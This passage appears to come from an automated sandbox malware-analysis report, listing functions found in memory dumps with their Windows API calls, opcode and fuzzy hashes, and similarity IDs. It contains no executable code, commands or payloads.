                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 1acfe9714382b90816e46089880b38b4d5a681af4274c2b80fb31930da8dfbec
                                                                                            • Instruction ID: f56f73a950a25c28698152495cb815267ac671ac06322ba10ee5c0889cae8782
                                                                                            • Opcode Fuzzy Hash: 1acfe9714382b90816e46089880b38b4d5a681af4274c2b80fb31930da8dfbec
                                                                                            • Instruction Fuzzy Hash: 0D215B7550D7C09FDB128B25DC55B92BFB4AF03224F0D84DAE988CF693D2659908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0289137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: f4799fe8b696225b4efed3e4e79f1804388adb462e2534c56e3c69262038fe9e
                                                                                            • Instruction ID: 01a010a8f26bd7ae35e17f621be2a44e6306c471fb6c5c68470367850eecd57e
                                                                                            • Opcode Fuzzy Hash: f4799fe8b696225b4efed3e4e79f1804388adb462e2534c56e3c69262038fe9e
                                                                                            • Instruction Fuzzy Hash: D42192765083809FDB21CF25DC45B96FFB4EF06220F08849AED898B562D235A459DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 004CB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: fd3625a2a6aa47133fe3d1a92334c97549e7b28858e0b0718fcc1a8731edb9c6
                                                                                            • Instruction ID: 2572bf64c62854a5a0ca36d1d90f0df574c896ea24ea0c43702a2c6f1a72c481
                                                                                            • Opcode Fuzzy Hash: fd3625a2a6aa47133fe3d1a92334c97549e7b28858e0b0718fcc1a8731edb9c6
                                                                                            • Instruction Fuzzy Hash: 67117F75600300EFEB20CF16DC86FABBBA8EF04760F14C46AE945CB241D775E9048AB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004CAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 5b35f33673257ab9f73df803cf60da1e56bdf63e9aa29b5e6664a40292d11cb3
                                                                                            • Instruction ID: c03a6f93c03a04f008bd209f37e951dcce04714055e5f27e921d251639632d20
                                                                                            • Opcode Fuzzy Hash: 5b35f33673257ab9f73df803cf60da1e56bdf63e9aa29b5e6664a40292d11cb3
                                                                                            • Instruction Fuzzy Hash: 0021A2B56053849FDB21CF25CC44B53BFA8EF06214F0884AFED49CB252E265E818CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 74c6be63a937e38679644083fc336a70785f87fbaf7474d54e9172be21bde330
                                                                                            • Instruction ID: bac1242021f17c3cb3f1970e78ec32aa699f14170303075c97e9bba066803a07
                                                                                            • Opcode Fuzzy Hash: 74c6be63a937e38679644083fc336a70785f87fbaf7474d54e9172be21bde330
                                                                                            • Instruction Fuzzy Hash: 36219F765093C09FEB128B25DC55B92BFA4EF07320F0984DBDD858F263D228A918DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028910D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 1dfdf200183ec3b007e1b83236a5baeae2b5163592a272728b90d9f8eee18701
                                                                                            • Instruction ID: 2e65f412b0555fa3ae3fe3ac39c6670a48d6b30c15a9d26d3a04884c6f19d984
                                                                                            • Opcode Fuzzy Hash: 1dfdf200183ec3b007e1b83236a5baeae2b5163592a272728b90d9f8eee18701
                                                                                            • Instruction Fuzzy Hash: 09216D7540D3C0AFDB138B259C54A62BFB4EF57620F0D80DBD8898F2A3D2695818D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 004CAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 305a68ac318e4670392a692ee267275a41ad59d1ad5e9383e565fd35f57b195d
                                                                                            • Instruction ID: 74f6d98408b0a5726716e0768d2ae613e111b221845242ec3df2694ae28bf686
                                                                                            • Opcode Fuzzy Hash: 305a68ac318e4670392a692ee267275a41ad59d1ad5e9383e565fd35f57b195d
                                                                                            • Instruction Fuzzy Hash: DA11E275500704EFEB21DF15DC85FA7FBA8EF44720F14846FE9058A281C674A9048BB6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 028908E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: e1a40becb9584b5c7b297999f82444b79943c09073103f3bd6eedfb1c02de670
                                                                                            • Instruction ID: b9be55bee8b3617e25f339506478c84fe41712f1cfac32629d0c058556853dad
                                                                                            • Opcode Fuzzy Hash: e1a40becb9584b5c7b297999f82444b79943c09073103f3bd6eedfb1c02de670
                                                                                            • Instruction Fuzzy Hash: 3311EF76000304EFEB21CF50DC81FA6FBA8EF04720F18845AE9499A241C671A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 004CBA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: d97549280a70cc5dc3abd3d574af2562009d6c2aeef0483c8b4848c5b7ae46f7
                                                                                            • Instruction ID: 8df9d1d8b9a5d103ba512668944cccfecf63f4ed62c52aedcbc2be36b0b94dce
                                                                                            • Opcode Fuzzy Hash: d97549280a70cc5dc3abd3d574af2562009d6c2aeef0483c8b4848c5b7ae46f7
                                                                                            • Instruction Fuzzy Hash: 7C119075504380AFDB21CF65CC45B52FFF4EF15210F08849EE9858B662D375A818CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028912D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 01418746deba5e1c77161cc0988c4f117f8fec065e2bc635f8ae996acc555cbf
                                                                                            • Instruction ID: d653a63a5ed35d45a06fd876007341d7f66305154c1556003dab45752ec69e6e
                                                                                            • Opcode Fuzzy Hash: 01418746deba5e1c77161cc0988c4f117f8fec065e2bc635f8ae996acc555cbf
                                                                                            • Instruction Fuzzy Hash: BA11C4755083809FDB118F15DC49B96FFA4EF06220F0884EEED498B252D235A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 004CA39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: b59345f452333ce0f84352f532c5a34b28daa2cf99bfc2e2fa0ff416ec55fd28
                                                                                            • Instruction ID: ada66fa4c210be2f837ea5d81e35d4d68f1e414b877c9f03555059b811c99ae9
                                                                                            • Opcode Fuzzy Hash: b59345f452333ce0f84352f532c5a34b28daa2cf99bfc2e2fa0ff416ec55fd28
                                                                                            • Instruction Fuzzy Hash: 96116D715093C49FEB128B15DC54BA2BFB4DF47614F0880CBEDC58B263D265A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028905E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 3c23543308440d6b8512aa33864d3eec7426475ff04c2defc2522641b0389e1a
                                                                                            • Instruction ID: 2b3c4e5ce2c2510644b05d8734cbead7750c2af00005008ae9ff166439ff484a
                                                                                            • Opcode Fuzzy Hash: 3c23543308440d6b8512aa33864d3eec7426475ff04c2defc2522641b0389e1a
                                                                                            • Instruction Fuzzy Hash: B911C2755093C09FDB128B15DC95B52FFB4DF42220F08C0DBED898B6A3D265A908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0289092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 9bb351a0206c5f7f84e0a9c962d433fda2031c70a82c962461118c27c484e3d7
                                                                                            • Instruction ID: e383a53858ac62a842b1ccc33fbd5a4389931ad8c2bd588f35a64fdc107eee39
                                                                                            • Opcode Fuzzy Hash: 9bb351a0206c5f7f84e0a9c962d433fda2031c70a82c962461118c27c484e3d7
                                                                                            • Instruction Fuzzy Hash: 0A1190754093C09FEB128B25DC55B92BFA4EF07324F0DC0DAD9888B163C265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004CAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 32b334927202ed3fe607d93eed1c0f64e4a774f6cf18b2c5ad709fa8243ae5c4
                                                                                            • Instruction ID: 58a281cd76b81df2ed0c98f8160b9a05b737f81f1ce0b83b315b79792738e6be
                                                                                            • Opcode Fuzzy Hash: 32b334927202ed3fe607d93eed1c0f64e4a774f6cf18b2c5ad709fa8243ae5c4
                                                                                            • Instruction Fuzzy Hash: 69117CB56003048FEB60CF25DC85B56FBA8EB14624F08C46ADE09CB342E675E814CA66
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 004CAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 2000e99d2ece44a8f3bda2779f8046654a8884be6d11f69570fa77628dcb3df5
                                                                                            • Instruction ID: 1693c7dc4d1365b4a9999fd8adc3f7e196f0db89885ef65be31995b8230ad264
                                                                                            • Opcode Fuzzy Hash: 2000e99d2ece44a8f3bda2779f8046654a8884be6d11f69570fa77628dcb3df5
                                                                                            • Instruction Fuzzy Hash: DF11C17540D7C49FD7128B21DC85B92BFA0EF13324F0980DBDD848F2A3D269A909C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028907C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 02890819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 51ecd0ecfbd32ee7340e2625dcece2075cfc536270492acc79c261b3864c8115
                                                                                            • Instruction ID: 121e8eee1bcf198aeb24e5e773201b632b63dbf6a17424b22bf990b308cdbf69
                                                                                            • Opcode Fuzzy Hash: 51ecd0ecfbd32ee7340e2625dcece2075cfc536270492acc79c261b3864c8115
                                                                                            • Instruction Fuzzy Hash: 45019279600704EFFB20DF15DC85FA6FB98DF44721F18C096ED099B281D674A904CAB6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028913AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 64b363db55de68708778d3a9753a10317aebf45b21cb0f98aad9d6451553b8f6
                                                                                            • Instruction ID: f22de3e2bcccb1b3d810d35b69b0a1aca8917a6ef66593944211d5b192b9c099
                                                                                            • Opcode Fuzzy Hash: 64b363db55de68708778d3a9753a10317aebf45b21cb0f98aad9d6451553b8f6
                                                                                            • Instruction Fuzzy Hash: 0411A97A504700DBEF20CF16D889B66FBA4EB04620F08C4AAED4ACA652D231E418DA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 004CABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 64ce90aaa3c95b6954399786e99b6967ff05395302ef4e5fd4064b3ac52a221c
                                                                                            • Instruction ID: 949347399d2c6bf7b071aeebaf9b418cae3baac2738e296da82b31645e34407c
                                                                                            • Opcode Fuzzy Hash: 64ce90aaa3c95b6954399786e99b6967ff05395302ef4e5fd4064b3ac52a221c
                                                                                            • Instruction Fuzzy Hash: 3E118EB55093849FDB11CF65DC85B92BFA4EF52324F09C0ABDD488F253D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 004CBA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 71b8f3af283e864b82c83989b8e483f65cb737fee3e01067dbbc0f85425ca7d7
                                                                                            • Instruction ID: a40f650d80d4f202a1be0481368f4cf3d8c1abc46c1c10248d31feaa182a3711
                                                                                            • Opcode Fuzzy Hash: 71b8f3af283e864b82c83989b8e483f65cb737fee3e01067dbbc0f85425ca7d7
                                                                                            • Instruction Fuzzy Hash: 9B118E76500700DFDB60CF55DC86B62FBE4EF14710F0884AEDD898A612D376E414DBA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 148666508d02eefaf006214e60b51047c50f8c314d73f4b735f4048fd8a6bb96
                                                                                            • Instruction ID: 1b80d0f9b56a357c79405d64db801445e9b94c5eb540ca49a50c3ad3376e565c
                                                                                            • Opcode Fuzzy Hash: 148666508d02eefaf006214e60b51047c50f8c314d73f4b735f4048fd8a6bb96
                                                                                            • Instruction Fuzzy Hash: 9C019E79604304CFEB10DF65DC85766FBA8DB00624F18C4AADC09CB642D774E404CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0289104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 9b9a8f398d499236f1234ea5c0d5f80d9d86d87471802da0d680b87095d32d64
                                                                                            • Instruction ID: 024c4eb3caf4c976b537b2d1fd26daf5d4edc07a68a47014b8e52267e9fe321d
                                                                                            • Opcode Fuzzy Hash: 9b9a8f398d499236f1234ea5c0d5f80d9d86d87471802da0d680b87095d32d64
                                                                                            • Instruction Fuzzy Hash: B1017171900600AFE710DF16DC46B66FBA8FB84A20F14816AED099B741D635B915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 004CA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 46550009b75cd16ca20d963f5ab25aea7c27b888e928c22d27f1537e09b2fe13
                                                                                            • Instruction ID: 626c3e547f2f644d1f54dfdb540537a4adfe0a6e7a7021cfb1c44e2b0376b00b
                                                                                            • Opcode Fuzzy Hash: 46550009b75cd16ca20d963f5ab25aea7c27b888e928c22d27f1537e09b2fe13
                                                                                            • Instruction Fuzzy Hash: 83018471900700AFE710DF16DC46B76FBA8FB84A20F14816AED089B741D635F915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028912FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: b5355fd5c12ae6229de3fcb7236a06bd9bd40d7ab9906632a09b3ddad71f9e23
                                                                                            • Instruction ID: 449dd8312d0888d20a5db7755460dc34fd1b92ea3e078366a1bd6f9fb43af57e
                                                                                            • Opcode Fuzzy Hash: b5355fd5c12ae6229de3fcb7236a06bd9bd40d7ab9906632a09b3ddad71f9e23
                                                                                            • Instruction Fuzzy Hash: E701BC79508300DFEF208F15D8897A9FBA4EF04620F0CC4AAED09CB642D679A404DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 0a4bd57c2b520114a7c7e8e0831aa95d4af6ebc0fd75ed248ee5bc9590924f34
                                                                                            • Instruction ID: 4f79ec2bd38579a39b4cde64688b13726763951551273e4feb010ad8e0a0fed4
                                                                                            • Opcode Fuzzy Hash: 0a4bd57c2b520114a7c7e8e0831aa95d4af6ebc0fd75ed248ee5bc9590924f34
                                                                                            • Instruction Fuzzy Hash: 8401B175900200DFEB608F15DC86B66FBA4EF04720F18C4AFDD498B656E779A804CBA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028904B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: ce2044e9bc6859d749c6f8c74ebcdd0b12119b90d3c310c266935fd3a7d7815f
                                                                                            • Instruction ID: 573de56797cedc2c0734ea77a1050166f3316219ebb6829462d5c264d72acc35
                                                                                            • Opcode Fuzzy Hash: ce2044e9bc6859d749c6f8c74ebcdd0b12119b90d3c310c266935fd3a7d7815f
                                                                                            • Instruction Fuzzy Hash: F4016271940600ABD310DF16DC46B26FBA4FB88B20F14C15AED085B741D675F925CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: ea7c52b0852f884580ee7c8670a2eab04e962f2584a30b870a4223ff6c948140
                                                                                            • Instruction ID: ac9e696ce7af3d6dbf9f1a6933a13bac52ae2a3c1ea37291d4d4c683bbe84c44
                                                                                            • Opcode Fuzzy Hash: ea7c52b0852f884580ee7c8670a2eab04e962f2584a30b870a4223ff6c948140
                                                                                            • Instruction Fuzzy Hash: B701BC79504304CFEB20CF15D885B66FB94EB00624F0CC0AADC08CF682D374E508CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 004CA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: b539c630c1293b5fe14dff2f18f264188c512889f0735249e12cc4779500a287
                                                                                            • Instruction ID: 309666bea921ccee560c14741b32fbfbb5e641f32bfe0f3661fa87f5b4d40bce
                                                                                            • Opcode Fuzzy Hash: b539c630c1293b5fe14dff2f18f264188c512889f0735249e12cc4779500a287
                                                                                            • Instruction Fuzzy Hash: DE016271940600ABD310DF16DC46B26FBA4FB88B20F14C15AED085B741D675F925CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0289060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 660b0139791d11403b24a3606317605b6bae5c821be4a522e6dda8d72652a82e
                                                                                            • Instruction ID: 8da8ffd9679a32bc519d72101a7067d2bf7ae3f15ae12ecc847e36a6da7a826b
                                                                                            • Opcode Fuzzy Hash: 660b0139791d11403b24a3606317605b6bae5c821be4a522e6dda8d72652a82e
                                                                                            • Instruction Fuzzy Hash: C801FF79600704CFEF218F19D885765FBA0EF41624F0CC0AADD4A8B753D775E808DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 004CABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 072bae3db9e3bafb013b2cec0c549bb13309727e4919d5ad12cbbab9c36f0455
                                                                                            • Instruction ID: 469352e8b18ef2bfb1f7f43f5781781763057cb94e52f44b9674f02e3a9c3003
